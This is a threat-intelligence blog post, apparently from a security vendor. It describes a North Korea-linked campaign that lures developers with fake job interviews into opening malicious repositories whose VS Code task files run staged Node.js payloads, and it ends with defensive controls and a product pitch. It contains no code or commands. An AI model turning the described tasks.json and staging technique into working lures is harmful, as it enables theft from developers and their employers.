PurpleBravo and the “Contagious Interview” Campaign Linked to North Korean Operators

This activity is tied to 3,136 IP addresses associated with likely targets and identified 20 potential victim organizations across multiple industries.

Key takeaways

Developer recruitment lures are now a repeatable initial access vector, not a one-off scam.

Trusted tooling is the delivery mechanism: Git repos, VS Code projects, task configuration files, and staged payloads.

The impact can jump from individual to enterprise fast when candidates run “tests” on corporate devices.

This is both espionage and theft-driven activity, aligned with the broader Contagious Interview cluster.

What happened

Insikt Group assessed PurpleBravo targeted 3,136 individual IP addresses from August 2024 through September 2025, with targeting concentrated around South Asia and North America. The 20 potential victim organizations spanned AI, cryptocurrency, financial services, IT services, marketing, and software development, with victim orgs based in countries including Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the UAE, and Vietnam.

A critical operational detail: in several cases, candidates likely executed malicious code on corporate devices, creating exposure that extends beyond the job seeker to their employer and downstream customers.

How the attack works in practice

PurpleBravo blends social engineering with developer-tool abuse to reduce friction and increase execution rates.

1) Persona-led recruitment lures

Operators used LinkedIn personas posing as developers and recruiters, supported by malicious GitHub repositories designed to deliver known malware families.

2) “Interview project” delivery via Git repositories

Victims clone and open a repository in Visual Studio Code as part of a supposed technical assignment. VS Code prompts the user to trust the repository author; granting trust allows VS Code to process project configuration, including task definitions that can run commands.

3) VS Code task abuse for execution

Jamf documented abuse of tasks.json to execute attacker-controlled commands, including configurations that run on project open, enabling execution when a victim opens the folder in VS Code.

4) Payload staging from trusted hosting

Jamf observed payload delivery staged on vercel.app infrastructure and executed via Node.js on macOS using background shell execution patterns that suppress output and persist beyond the VS Code process.

5) Malware toolchain and C2 operations

Insikt Group reported PurpleBravo-managed C2 for BeaverTail (JavaScript infostealer/loader) and GolangGhost (Go-based backdoor, also tracked as FlexibleFerret or WeaselStore), with infrastructure hosted across 17 providers and administered via Astrill VPN with activity observed from IP ranges in China.

Source

Why this matters: the IT software supply chain is the target

This campaign is not limited to “developer compromise.” The supply-chain angle is structural:

Many targets operate in IT services and staff augmentation, often advertising large customer bases, which creates downstream risk if a provider’s developer workstation becomes a foothold.

The compromise pathway bypasses traditional perimeter narratives by abusing everyday workflows: hiring, coding tests, repositories, and IDE configuration.

Insikt Group also highlighted intersections between PurpleBravo and North Korean IT worker activity tracked separately as PurpleDelta, reinforcing that “job-related access” is a strategic lane for DPRK operations, not a single tactic.

Defensive playbook: controls that actually break the chain

Stopping this class of attack requires tightening how developer environments handle untrusted code and how corporate devices are used during recruiting.

Hiring workflow controls

Require interview coding assessments to run only inside a company-managed sandbox environment, not on employee primary endpoints.

Prohibit using corporate devices for external interview take-homes unless the environment is isolated and disposable.

Treat “recruiter-provided repos” as untrusted software supply chain inputs with mandatory review gates.

Developer workstation hardening

Enforce application control policies for script interpreters and developer runtimes where feasible, especially Node.js execution paths used for chained payloads on macOS.

Restrict outbound access from developer endpoints to high-risk hosting patterns when not required for business, including selective controls over common “stage-and-fetch” infrastructure observed in campaigns.

Improve endpoint detection coverage for IDE-launched child processes, suspicious shell usage, and “download-and-execute” behaviors.

VS Code and repository guardrails

Disable or tightly govern auto-run task execution behaviors and treat repository trust prompts as security-relevant decisions.

Create policy that any repository containing task automation must be reviewed before execution.

Add code-scanning gates for repos and enforce secrets scanning to reduce the blast radius if compromise occurs.

Identity and credential theft containment

Assume browser credential and wallet targeting where BeaverTail-class tooling is present, and enforce strong session controls, password manager policies, and rapid token revocation workflows.

InfoSight perspective: treat developer tools as part of exposure management

PurpleBravo’s success comes from exploiting a gap in many security programs: developer tooling and workflows are often treated as “productivity plumbing,” not as first-class attack surface.

InfoSight’s approach aligns with continuous exposure management: inventory the tooling that can execute code, measure where exposure concentrates, and drive remediation based on real-world attacker tradecraft rather than generic best practices.

Where InfoSight Mitigator Vulnerability & Threat Management fits this specific problem set:

Asset and software visibility for developer endpoints, build runners, and critical toolchains so unapproved runtimes and risky configurations do not hide in plain sight.

Risk-based prioritization that emphasizes exploit-driven pathways and reduces time-to-remediation for the exposures most likely to enable initial access and credential theft.

Operational reporting that tracks remediation performance over time, showing whether exposure windows are shrinking or simply shifting.

PurpleBravo is a reminder that modern software supply chain risk includes the people and tools that produce software, not only the packages and pipelines.